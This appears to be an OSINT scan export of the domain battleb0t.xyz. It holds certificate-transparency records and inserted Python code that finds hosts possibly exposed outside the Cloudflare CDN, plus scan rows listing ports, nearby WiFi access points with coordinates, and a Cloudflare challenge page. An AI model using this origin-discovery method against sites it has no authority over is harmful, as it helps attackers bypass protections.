u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', 
u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': 
u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
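Turning the crt.sh dump in the row above into something usable, as an added example (not SpiderFoot's or crt.sh's code). Two things a practitioner wants from such a dump: every certificate appears twice because the precertificate and the final certificate are separate log entries, so deduplicate on the serial number; and the `name_value` field packs several SANs separated by newlines, so split it before collecting hostnames. The sample entries are excerpted from the dump above with only the fields used here. The split between CDN-issued and other certificates is a heuristic and an assumption of this example: a per-hostname Let's Encrypt certificate was requested by whoever operates that host, often the origin behind the CDN, but Cloudflare also obtains certificates for customers through other CAs, so a non-Cloudflare issuer does not prove an exposed origin. Resolve each candidate and check where it points before treating it as one.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, Iterable, List, Optional, Set


def _entry(serial, names, cn, issuer, nb, na, log_id) -> Dict:
    """Build one crt.sh-style log entry (only the fields this example uses)."""
    return {"serial_number": serial, "name_value": names, "common_name": cn,
            "issuer_name": issuer, "not_before": nb, "not_after": na, "id": log_id}


LE = "C=US, O=Let's Encrypt, CN=R3"
CF = 'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3'
GTS = "C=US, O=Google Trust Services LLC, CN=GTS CA 1P5"

# Excerpt of the crt.sh entries shown above for battleb0t.xyz. Note the first two
# rows: same serial, different log ids (precertificate plus final certificate).
CRTSH_ENTRIES = [
    _entry("0450556de56492a07fd0de032baf77c2fcfe", "nwapi2.battleb0t.xyz", "nwapi2.battleb0t.xyz", LE, "2023-05-04T19:22:49", "2023-08-02T19:22:48", 9313572020),
    _entry("0450556de56492a07fd0de032baf77c2fcfe", "nwapi2.battleb0t.xyz", "nwapi2.battleb0t.xyz", LE, "2023-05-04T19:22:49", "2023-08-02T19:22:48", 9308913897),
    _entry("038dd7e0051838a5db8a4864f2689a9822c8", "battleb0t.xyz\nwww.battleb0t.xyz", "battleb0t.xyz", LE, "2023-04-26T02:43:31", "2023-07-25T02:43:30", 9249459074),
    _entry("03d7564b39cd635b72071eba15c9f72ce733", "oldfluid.battleb0t.xyz", "oldfluid.battleb0t.xyz", LE, "2023-04-24T04:50:12", "2023-07-23T04:50:11", 9235878846),
    _entry("044e821a86ae7d8a393c2524c646dfb3a2f4", "fluid.battleb0t.xyz", "fluid.battleb0t.xyz", LE, "2023-04-24T03:43:01", "2023-07-23T03:43:00", 9235401447),
    _entry("038880c39ce1f505d4ceeba7b88b966916e7", "kekw.battleb0t.xyz", "kekw.battleb0t.xyz", LE, "2023-03-27T13:22:33", "2023-06-25T13:22:32", 9021136086),
    _entry("26cc7f01c692257813509e4880751557", "*.battleb0t.xyz\nbattleb0t.xyz", "*.battleb0t.xyz", GTS, "2023-03-23T22:37:05", "2023-06-21T22:37:04", 8969484265),
    _entry("09cccb40358f10167bc737cb947e311a", "*.battleb0t.xyz\nbattleb0t.xyz", "sni.cloudflaressl.com", CF, "2023-03-23T00:00:00", "2024-03-21T23:59:59", 8968494929),
    _entry("03026deb8d637804f2b85cdb3906ab26eda9", "funny.battleb0t.xyz\npics.battleb0t.xyz", "funny.battleb0t.xyz", LE, "2023-03-15T23:40:10", "2023-06-13T23:40:09", 8924480030),
    _entry("04b63933afde1e32f3fc2e76dcbc08518610", "battleb0t.xyz\nwww.battleb0t.xyz", "battleb0t.xyz", LE, "2023-02-25T01:39:25", "2023-05-26T01:39:24", 8805533709),
]


@dataclass(frozen=True)
class CtCert:
    serial: str
    names: frozenset
    issuer: str
    common_name: str
    not_before: datetime
    not_after: datetime


def dedupe(entries: Iterable[Dict]) -> List[CtCert]:
    """Collapse log entries onto certificates: one CtCert per serial number."""
    seen: Dict[str, CtCert] = {}
    for e in entries:
        serial = e["serial_number"].lower()
        if serial in seen:
            continue
        seen[serial] = CtCert(
            serial=serial,
            names=frozenset(n.strip().lower() for n in e["name_value"].split("\n") if n.strip()),
            issuer=e["issuer_name"],
            common_name=e["common_name"],
            not_before=datetime.fromisoformat(e["not_before"]),
            not_after=datetime.fromisoformat(e["not_after"]),
        )
    return list(seen.values())


def hostnames(certs: Iterable[CtCert], as_of: Optional[datetime] = None) -> Set[str]:
    """All SANs seen, optionally restricted to certificates valid at `as_of`."""
    names: Set[str] = set()
    for c in certs:
        if as_of is not None and not (c.not_before <= as_of <= c.not_after):
            continue
        names.update(c.names)
    return names


def cdn_fronted(certs: Iterable[CtCert]) -> Set[str]:
    """Common names of certificates issued by Cloudflare (the CDN's own edge certs)."""
    return {c.common_name for c in certs if "Cloudflare" in c.issuer}


def origin_candidates(certs: Iterable[CtCert]) -> Set[str]:
    """Heuristic (assumption, see lead-in): non-wildcard names on certificates not
    issued by the CDN are leads for hosts that may be reachable outside it."""
    out: Set[str] = set()
    for c in certs:
        if "Cloudflare" in c.issuer:
            continue
        out.update(n for n in c.names if not n.startswith("*."))
    return out
```

Run `hostnames(dedupe(CRTSH_ENTRIES), as_of=datetime(2023, 5, 12))` for the names that had a live certificate on the scan date; the wildcard entry with common name `sni.cloudflaressl.com` is the marker that the zone is behind Cloudflare.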
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2086 | 104.21.6.166 |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | malsup.github.io | 185.199.108.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | StartMotor (Net ID: 00:02:CF:A1:A1:06) | 40.2024, 29.0398 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | BudgetScottsdale (Net ID: 00:09:5B:29:02:37) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:55:32 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:aa:0b:fb:f5:72:57:f7:90:57:35:0a:22:0c:3a:41:5a:d1
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:48:35 2023 GMT
Not After : Apr 14 17:48:34 2023 GMT
Subject: CN=funny-face-pictures.nom-nom.link
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:bd:1c:66:69:41:70:5a:26:6b:f9:5d:75:98:b4:
8f:50:49:99:4a:13:c7:34:5d:07:06:03:17:45:62:
35:db:24:d3:13:a5:28:c9:bc:9e:26:03:0e:28:c7:
d0:92:34:41:85:ff:c9:ec:be:04:85:ca:56:f3:8d:
46:7d:03:91:0a
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D0:E0:AC:A3:54:40:02:9F:45:F6:D9:F1:FF:DC:7A:58:77:FF:5A:B0
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny-face-pictures.nom-nom.link, DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a9:fd:fd:93:70:29:b0:48:11:c8:ce:bf:67:f2:09:f0:18:36:
72:e2:d5:45:1a:22:98:73:7b:fc:63:f5:37:b4:8e:20:c8:45:
e4:ce:e2:9e:72:73:e8:ad:47:bf:c0:35:30:a0:a9:68:42:7b:
af:a0:57:45:fd:5a:91:a4:2e:d5:a2:69:b2:ca:b8:65:ec:5c:
97:2b:5a:c2:47:61:9f:c4:81:87:89:15:e0:4d:14:10:00:57:
de:30:17:e4:75:38:ea:ab:0b:a9:2e:0e:a3:de:bf:1e:49:35:
76:16:95:0e:f2:76:59:a6:60:31:e4:31:da:5e:f7:3d:1a:b6:
45:fb:43:8b:75:fa:55:4a:bf:3c:53:c5:63:68:3b:09:79:60:
3e:59:90:9c:6f:29:ba:5e:2e:69:99:fe:bf:eb:b8:a8:a2:e5:
6a:e1:ab:7d:7b:0c:fc:a2:d8:0c:8f:d2:5f:a3:53:b9:f8:44:
96:05:f5:bc:85:79:5a:77:18:35:7d:ad:c6:2f:17:ce:cc:e8:
15:70:ec:81:d3:7e:77:0e:2a:9b:e5:1b:d9:8c:57:bd:a3:bc:
0a:e0:67:62:79:dd:4b:90:cc:e8:41:75:b0:89:34:3b:68:0e:
36:40:32:41:3e:6c:17:bc:5d:a4:cc:91:d3:38:4a:ce:c8:1b:
ab:60:7c:08
| battleb0t.xyz |
| 2023-05-12 03:33:13 | Web Content Language | No | Language Detector | 0 | 0 | 5 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5a3bb81a1b')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="e35Zj8G5BDk9XldXhqgKMMl4m4jJjyX9hPpRt8lgb3o-1683861861-0-AeRvD12zRrpKT1Vj_NZpuXTYPY0T_C-IsEnAR9u2dCvcdsLy9Sv3iw7wV_fgwkqNl3iHxdj5qFwNZJL3xkB-iwW9vjUdMNxMyhnqv8JlscfNtie9SAcppGbOk7uCBiZIQLa1SBVNw6UUv-_a_FXFD2296FJ4KrNIS6arC6VFPDD30uM_354WVFgyW4mKtrSpYK5InwieJ1Vkv6ZxoCDhBRMhNxgPpigNP0QmWXw8y1_k8lflCwo_Q9K8uZ_qtQFf0Gfd14ZLuORqP0m48rgXZsNXk2d82Mm2SMemmjVviG7PuPUL1CbnB3WfSK2OQGeY4U-Gy7kSdq7i3_ymV00fkl4RBJdkPDOtsR2eeN44cG0QzvhUzJu9a18Wx-JBgeMkCDDp2c6FvebNEOQydvCZrys93XZSGdta0GBiBfCz0DM6AFXJXoguOORHg7MOd62eoxeeua6hY1HFOifFbgHz4R4_F4geEyT8xPiS9kLqmv-8Tv9wFT23J38aRv3VS8KGL7JX_pO7KJv7qjQiIN2XDIN1kP01EuKi5fpoFbmvumK_aQpspEPJd-oYkv6g3z8upJ_i8gMQOJzdPMV462qdkEt72KoSPvIxKpy4bKNXJwJjWy3MhsDm6o8-oFAI7dOznlN5m1idwbZgvsnclXbdkqJhXPQYzxjKdzlT7hyQKmtmMash-U3aTKSIpDEKkTstu-cs5rTf__9DuNB2pVPrKXIFuY7EwlrjB6j_0UJKavfBfT6h3NsKR3qKMg-rGVo2RSQdsEOud7Hh5F0cMs0nCAAWGTq86XwfC81O29W1K2i6OalWYJiW61x1Nv_qs72KoX0_Mpn3amoMA5KS1vGI6mPUPMiOwHSI0cRgqEERjtVjkE3-TwMesGkKvz-Aw2gGE9OL21frfN9JEzkR172OTICxrUfc7caDwzr9D9_NePtArl9cLDKFHEvxIxzgioPuODDLvyAfvi0dPWiWhMq7WkvCuoWovUiUA253wYEf7M9x4gD8lnc3kaUCBX9tFmIajIXhsaHhaKh_ysHvt7SDv4HQuHFmdW_PTHj46eP5odywpuZGDTSuWK7SWH7u71n7C_Ae4KUmVvgKAwroZ_dlv8I2ROpq-QoxjIwoWtmm2DsGljOITbn0msRXnKPyZMK8B7bxqx0Tk0lwfAxw5qFIfx9cKTkyEKNgMaJHKVRsdCxtQMpTYYbYCTs7ecYaFA-cfa8pDUJO-vS3eg6mjgEiRw-8bm1dPWtPUv2T1GYeSsTkWX7p26b8BfAn4XpyF65-516ZnQxFqk_LYA1aiczQzQWdLb1NuFpyAlTJVRij048j5uSY5WFvTrmsh7xjoZ2Z46DkwHtY4crfRZm3SD6Mg_03vOiI68rC6vzz6BqdsamaXqvoFcnUbGnDDjkCNPCk0I7LyG6AFbm_EwgFVB9gZOJPVWeWKxdCcEWIQQOyO_AqVnN-wyzH0S5fWbIjXusPp_qMzz38MsJyGlFbc7GOuh6S4SdpuQewqWPsqFDGHPGtQUEKXIDpP7weMLUYzqItqb4vPv3n4sxn1GsE-qNs3lpwxVrc1SL_ssnb3-_jfGgVSpkOmJliBGGmoH-AatJn35K3t_jno9HyCYJLmz1rZkbI33XoOACdRBNvladuDXSHE4m8J_n-NLMdDcqru4xU65kcr9OibRXR4hHHwc3rYYFV9kMj9KFuctQB10AWFL0_n3yW8Zlh4cik5rYLuGKboFr2i4pY9ykLSq7sms7Qe3oXXbRcmeWxKtL0NlB6gk_PWz-AAqtF3sr5sdva-7sRfyfrgrQxpiH5_wMb5DPqczx1O37xCMTLyF6YhMXn4ABmLQ-mt-EMWYX-tkGM85skgM2leXXJlv6HTAp-riDNoZ3OMVT4KeKIc6AIi8pOLxrJ9jD5o
VgtqxZff2ZqlinhLXHPSVtkPU-H6FAHinPrzSf3uH_Q3H0UuvzybBwb61Kz9xfOtHBkP2nWMCU86xpSbO4c6VIi3roOnQLOncMey4LehldRzG60kvAcLOIIzsotkC6A0TzBdXW6h8WnOc98kvqVlyyluYDZoGL2sgBQP5iT8LeZ1GiKa6nuzXWAIZArCXDfvtsaNftRUiJODl-iLsalLmXB287qXlXnC-Sqn-VkYBIG1c0SYjAXzvc-MH1JJfTmtb7X2x-mXdkkqwoy16YRiEGxdDA84vt_3-1PJIVkwQFdJL01areTvrgmeIqm94L-DFciyanQyUBPitgHcxMUsm51YpB6KDWM18BLL4ehHRO7XO7TX_IIKdZiHbwQcPJ8FX04IKxS2S5Y3q_h8S65tynRA7TtY9YDIyDgHWfsgLSoL1L6GRBWm_cX_GqkdNtINyYbvrEjvcbcBhRdYEvzv7ySe_t5eEL9DPxXMRgGUTSk5GXudJNBbnpRMcYsT7qBIns8TOaWZIAFXnDbumx2Yzf2QUY6Xnq_tYLe1hwa_1BstafWXYwwQNC50mTlgJK1S5YWtg1SKoybbC9x5fcZ1N-_oCRgLtaxFqIZMUnOoV0u2hpdcXGPpNrOH3SR">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '70037',
cRay: '7c5f8c5a3bb81a1b',
cHash: '1cbb584e4678a4a',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'QLdIKmVk90yEleUYFE8hq2th+l+jM4Uner6m/PqgQtgOm/j9Wu0B6Nwve/VIS31m9W0lb1V8I9RlPI3LD6ZpGikA+cl1xSe9juPQwbg/Khf2e9vfPpLKN0X7UvbusnivZuKA6TGjro8M7MljUWp3taWc0NTFEoxbvZYXtf23gnOsGXD0P3fio4y3xX1t0tyqoIYWkX6yVqHvCXS1I5Mc00CNY00FBcI/7efFMNVH6yXhbtO4DyojjSzFMA05WgLv1NMq/SwjeKgTF2UQjV1ScyP6xlwF4X/SOwW0/jc9ATHtwcZox/DXcQhTbYvzRGwtclm7F8sB4NPhEbop1gXy97S6V5xE84j90At9GihMuWgC3j9pOQviCNo3sewEE1wcCPBex3qLyb9lbO0GI3TZ/lO3ce3eYjSncgsTFzLP72SeeH7Cmkp5RZNQKUNY6KsNqv0SoqAADgpekKlGL1tqVOG6O7u3V3DisK9MR45AkotpTXq8Qr9XZQjfqaCO5Yfbn8lV1zfjI7l05/9wUrB6DYoT7pc7b3AgDm+BZdc44QE9FZKV/xPKQptYvP3Z+ZLT',
t: 'MTY4Mzg2MTg2MS40NzgwMDA=',
m: 'l9x6fYD43AkOSli+eEX3TiMPXRiBndCq0G/Dpt1PKp4=',
i1: 'nuJed/J938+IZsnq9K0k2g==',
i2: 'LCpeQRd016F0btwfkm2M8w==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5a3bb81a1b');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5a3bb81a1b';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | \005\014\006\035\026\027\003\037\003\037\022\032\0 (Net ID: 00:06:25:0B:A9:FE) | 39.0469, -77.4903 |
| 2023-05-12 02:47:07 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
c7:83:d8:18:48:a0:26:ac:0e:41:bf:5e:7d:c6:c3:07
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Jan 17 09:16:26 2023 GMT
Not After : Apr 17 09:16:25 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:c9:69:39:93:28:ab:3e:d3:a5:d5:a5:72:cd:be:
43:92:fc:b1:41:1e:65:40:ba:b6:a5:98:c9:0a:c1:
0a:16:38:c6:f0:6f:13:8a:f1:50:6e:63:c7:c9:4d:
3d:84:6a:35:2b:f1:16:92:ef:9c:26:1f:97:22:55:
e7:7e:fd:a5:40:94:99:7b:2a:b2:9f:89:9a:e1:30:
e0:1b:38:af:f1:7d:fe:1d:f3:e2:fc:ad:49:66:7b:
1e:5b:c2:73:59:c0:35:17:1a:cb:8b:a8:f6:c4:6d:
b8:77:b7:bc:64:fb:68:2f:62:4e:80:30:15:70:8f:
2d:50:8e:a9:f6:b0:b5:02:42:f1:48:e2:81:92:3e:
44:a6:5b:69:a6:54:e5:ee:c1:74:2a:c1:ec:11:dc:
59:f2:1e:65:9f:eb:94:d2:24:cd:99:20:ee:91:26:
11:c9:44:8f:62:f0:c5:34:f8:77:d4:9d:29:a7:42:
e2:30:2c:71:73:82:02:34:4e:a9:30:9a:b9:ab:95:
0a:72:71:e0:79:05:25:70:cd:6a:cc:a1:b4:51:7d:
04:6f:2b:68:12:e1:a4:1d:84:68:0d:5c:76:58:33:
de:fd:16:f6:1b:5f:7b:dc:4d:c0:66:3d:ae:d0:46:
c8:c8:e1:83:f9:b8:7a:33:57:f8:8e:90:08:fd:c7:
e2:e9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
31:FB:31:C7:D3:F3:CF:11:AF:91:FA:E4:71:40:41:2F:C4:66:90:11
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/mFVJO6PGh8g
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/Zn3bDrcK0Gs.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
8f:de:2d:05:92:69:48:3c:56:fc:22:08:a2:35:bd:c8:57:65:
b5:6f:33:0c:aa:bc:76:e8:1d:42:77:47:bc:ae:0e:80:ed:dd:
d3:8e:f7:0f:aa:49:99:2e:fb:bb:2f:e3:ed:b0:fc:04:11:23:
70:ae:f2:d5:ad:55:18:89:fd:c2:f1:f7:ab:64:01:10:ce:86:
6e:5a:5f:19:d1:b4:39:19:cf:7c:c2:bd:e3:c7:5a:bd:91:f4:
86:d0:db:9a:02:e1:5f:ff:08:f2:7f:c9:ca:5d:f9:53:49:db:
4d:e4:6b:a2:d8:53:33:76:e9:c8:7d:9b:a1:37:1c:e1:fd:14:
